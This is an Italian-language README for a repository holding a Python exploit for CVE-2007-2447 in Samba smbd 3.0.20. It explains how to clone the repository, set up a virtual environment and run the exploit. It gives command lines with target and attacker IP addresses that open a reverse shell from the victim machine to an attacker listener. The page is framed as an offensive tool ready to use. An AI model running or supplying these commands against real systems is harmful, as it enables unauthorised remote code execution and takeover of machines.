
Exploit in Python per Samba smbd 3.0.20 (CVE-2007-2447) che consente l'esecuzione remota di comandi e una reverse shell tramite richieste SMB appositamente modificate.
Questo repository contiene un exploit per Samba smbd 3.0.20 (CVE-2007-2447) che consente l'esecuzione remota di comandi tramite richieste SMB appositamente create.
Questo exploit richiede Python 3 e alcune dipendenze. Si consiglia di configurare un ambiente virtuale prima di eseguire l'exploit.
Clona il repository:
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
Crea un ambiente virtuale Python:
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(Gli utenti Windows possono attivarlo usando: smb_env\Scripts\activate)
Installa le dipendenze necessarie:
pip install -r requirements.txt
Una volta configurato l'ambiente virtuale, puoi eseguire l'exploit usando la seguente sintassi:
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target: indirizzo IP della macchina target (vittima).-a / --attacker: indirizzo IP del listener dell'attaccante.-p / --port: porta per stabilire la connessione reverse shell.Una volta terminato, disattiva l'ambiente virtuale usando:
deactivate